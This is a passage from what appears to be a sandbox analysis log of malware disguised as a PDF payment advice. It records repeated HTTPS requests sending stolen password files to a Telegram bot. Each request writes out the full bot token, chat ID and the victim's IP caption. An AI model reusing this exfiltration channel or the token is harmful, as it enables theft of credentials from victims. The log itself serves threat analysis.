                                                                                                                                  2024-12-17 07:43:49 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:49 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:49 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13696,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421429,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.449852149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:52 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd2010a61c1fbb
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 31 30 61 36 31 63 31 66 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd2010a61c1fbbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:52 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:52 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:52 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13697,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421432,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.449861149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:55 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd203e5f0cc69e
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 33 65 35 66 30 63 63 36 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd203e5f0cc69eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:56 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:56 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:56 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13698,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421436,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.449871149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:59 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd20739cdded1d
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 37 33 39 63 64 64 65 64 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd20739cdded1dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:59 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:59 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:59 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13699,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421439,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.449880149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:44:02 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd20b042e931e1
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:44:02 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 62 30 34 32 65 39 33 31 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd20b042e931e1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:44:02 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:02 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:44:02 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13700,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421442,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.449890149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:44:05 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd20f1af2d3636
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:44:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 66 31 61 66 32 64 33 36 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd20f1af2d3636Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:44:06 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:06 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:44:06 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13701,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421446,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  19192.168.2.449899149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:44:09 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd214717f9b5d8
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:44:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 34 37 31 37 66 39 62 35 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd214717f9b5d8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:44:09 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:44:09 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:44:09 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13702,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421449,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  20192.168.2.449910149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:44:12 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd21a75f8a832e
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
